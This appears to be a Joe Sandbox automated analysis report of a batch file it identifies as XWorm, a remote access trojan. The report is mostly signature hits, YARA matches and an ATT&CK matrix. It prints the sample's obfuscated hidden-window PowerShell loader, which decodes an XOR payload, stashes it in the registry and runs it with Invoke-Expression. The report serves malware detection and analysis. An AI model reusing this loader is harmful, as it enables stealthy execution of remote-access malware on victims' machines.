Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 3.2.powershell.exe.24311715540.7.raw.unpack, Unhook.cs	Reference to suspicious API methods: VirtualProtect((IntPtr)((long)moduleHandle + num5), (IntPtr)num6, 64u, out var oldProtect)
Source: 3.2.powershell.exe.24311715540.7.raw.unpack, Program.cs	Reference to suspicious API methods: GetProcAddress(LoadLibrary(bavkmsLBGTsuCIUPxeNajklsXCgRhERjiyTqCLuQEHmaFtfZkU.RxzferoCMjMtTBCJLDoeMlkwVbyKmeWHhMnTjDUcBzzKEKnkXv("LzUlLS1vJS0t", 65)), bavkmsLBGTsuCIUPxeNajklsXCgRhERjiyTqCLuQEHmaFtfZkU.RxzferoCMjMtTBCJLDoeMlkwVbyKmeWHhMnTjDUcBzzKEKnkXv("XWxvXW59dmxPanFsfQ==", 24))
Source: 3.2.powershell.exe.24311715540.7.raw.unpack, Program.cs	Reference to suspicious API methods: GetProcAddress(LoadLibrary(bavkmsLBGTsuCIUPxeNajklsXCgRhERjiyTqCLuQEHmaFtfZkU.RxzferoCMjMtTBCJLDoeMlkwVbyKmeWHhMnTjDUcBzzKEKnkXv("LzUlLS1vJS0t", 65)), bavkmsLBGTsuCIUPxeNajklsXCgRhERjiyTqCLuQEHmaFtfZkU.RxzferoCMjMtTBCJLDoeMlkwVbyKmeWHhMnTjDUcBzzKEKnkXv("XWxvXW59dmxPanFsfQ==", 24))
Source: 3.2.powershell.exe.24311a0a420.2.raw.unpack, NativeMethods.cs	Reference to suspicious API methods: OpenProcessToken(hProcess, desiredAccess, out var TokenHandle)
Source: 11.2.powershell.exe.22819b4d148.4.raw.unpack, Messages.cs	Reference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
Source: 11.2.powershell.exe.22819b4d148.4.raw.unpack, XLogger.cs	Reference to suspicious API methods: MapVirtualKey(vkCode, 0u)

Encrypted powershell cmdline option found

Source: unknown

Process created: Base64 decoded iNVoKe-eXpReSsIon ((Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows Search' -Name '$phantom-frZZfx') | Select-Object -ExpandProperty `$phantom-frZZfx)

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -c "Write-Host ('dedaoL rotcartxE llehsrewoP'[-1..-27] -join '');$path = $env:tMHryVWCxy;$path = $path.Trim();try {$_1 = Get-Content -Path $path.Substring(1, $path.Length - 2) -ErrorAction Stop;} catch {$_1 = Get-Content -Path $path}$_3 = $_1 -split '\n';$_2 = $_3[-1];$_2 = [Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_2.Replace('\n', ''));$_4 = New-Object byte[] $_2.Length;for ($_5 = 0; $_5 -lt $_4.Length; $_5++) {$_4[$_5] = $_2[$_5] -bxor 0x20;};$_4 = [System.Text.Encoding]::Unicode.GetString($_4);Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows Search' -Name '$phantom-frZZfx' -Value $_4;Remove-Item -Path $path -Force;$_4 | Invoke-Expression"

Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -c "write-host ('dedaol rotcartxe llehsrewop'[-1..-27] -join '');$path = $env:tmhryvwcxy;$path = $path.trim();try {$_1 = get-content -path $path.substring(1, $path.length - 2) -erroraction stop;} catch {$_1 = get-content -path $path}$_3 = $_1 -split '\n';$_2 = $_3[-1];$_2 = [convert]::('gnirts46esabmorf'[-1..-16] -join '')($_2.replace('\n', ''));$_4 = new-object byte[] $_2.length;for ($_5 = 0; $_5 -lt $_4.length; $_5++) {$_4[$_5] = $_2[$_5] -bxor 0x20;};$_4 = [system.text.encoding]::unicode.getstring($_4);set-itemproperty -path 'hkcu:\software\microsoft\windows search' -name '$phantom-frzzfx' -value $_4;remove-item -path $path -force;$_4 \| invoke-expression"
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -ec aqboafyabwblagualqblafgacabsaguauwbzaekabwbuacaakaaoaecazqb0ac0asqb0aguabqbqahiabwbwaguacgb0ahkaiaatafaayqb0aggaiaanaegaswbdafuaogbcafmabwbmahqadwbhahiazqbcae0aaqbjahiabwbzag8azgb0afwavwbpag4azabvahcacwagafmazqbhahiaywboaccaiaatae4ayqbtaguaiaanacqacaboageabgb0ag8abqatagyacgbaafoazgb4accakqagahwaiabtaguabablagmadaatae8aygbqaguaywb0acaalqbfahgacabhag4azabqahiabwbwaguacgb0ahkaiabgacqacaboageabgb0ag8abqatagyacgbaafoazgb4acka
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -c "write-host ('dedaol rotcartxe llehsrewop'[-1..-27] -join '');$path = $env:tmhryvwcxy;$path = $path.trim();try {$_1 = get-content -path $path.substring(1, $path.length - 2) -erroraction stop;} catch {$_1 = get-content -path $path}$_3 = $_1 -split '\n';$_2 = $_3[-1];$_2 = [convert]::('gnirts46esabmorf'[-1..-16] -join '')($_2.replace('\n', ''));$_4 = new-object byte[] $_2.length;for ($_5 = 0; $_5 -lt $_4.length; $_5++) {$_4[$_5] = $_2[$_5] -bxor 0x20;};$_4 = [system.text.encoding]::unicode.getstring($_4);set-itemproperty -path 'hkcu:\software\microsoft\windows search' -name '$phantom-frzzfx' -value $_4;remove-item -path $path -force;$_4 \| invoke-expression"	Jump to behavior

Source: powershell.exe, 00000003.00000002.2338047448.00000243025A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2338047448.00000243024E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2338047448.0000024302514000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
Source: powershell.exe, 00000003.00000002.2338047448.0000024302338000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2338047448.00000243025A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2338047448.00000243024E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: powershell.exe, 00000003.00000002.2338047448.0000024302338000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>1
Source: powershell.exe, 00000003.00000002.2338047448.0000024302338000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2338047448.00000243025A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2338047448.00000243024E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager2=
Source: powershell.exe, 00000003.00000002.2338047448.0000024302338000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>1
Source: powershell.exe, 00000003.00000002.2338047448.00000243025A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2338047448.00000243024E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2338047448.0000024302514000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: powershell.exe, 00000003.00000002.2338047448.00000243025A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2338047448.00000243024E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2338047448.0000024302514000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
Source: powershell.exe, 00000003.00000002.2338047448.0000024302338000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>1@

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: 11.2.powershell.exe.22819b56788.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.22819b4d148.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.22819b4d148.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.22819b56788.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2338047448.00000243022FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1553871152.0000022819B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 332, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7632, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: 11.2.powershell.exe.22819b56788.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.22819b4d148.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.22819b4d148.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.22819b56788.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2338047448.00000243022FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1553871152.0000022819B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 332, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7632, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	11 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	1 Input Capture	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	12 Process Injection	1 Obfuscated Files or Information	LSASS Memory	12 System Information Discovery	Remote Desktop Protocol	1 Input Capture	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Command and Scripting Interpreter	1 Scheduled Task/Job	1 Scheduled Task/Job	2 Software Packing	Security Account Manager	111 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	2 PowerShell	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	121 Virtualization/Sandbox Evasion	SSH	Keylogging	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Modify Registry	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	13 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	121 Virtualization/Sandbox Evasion	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report georgefloyd.bat

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
georgefloyd.bat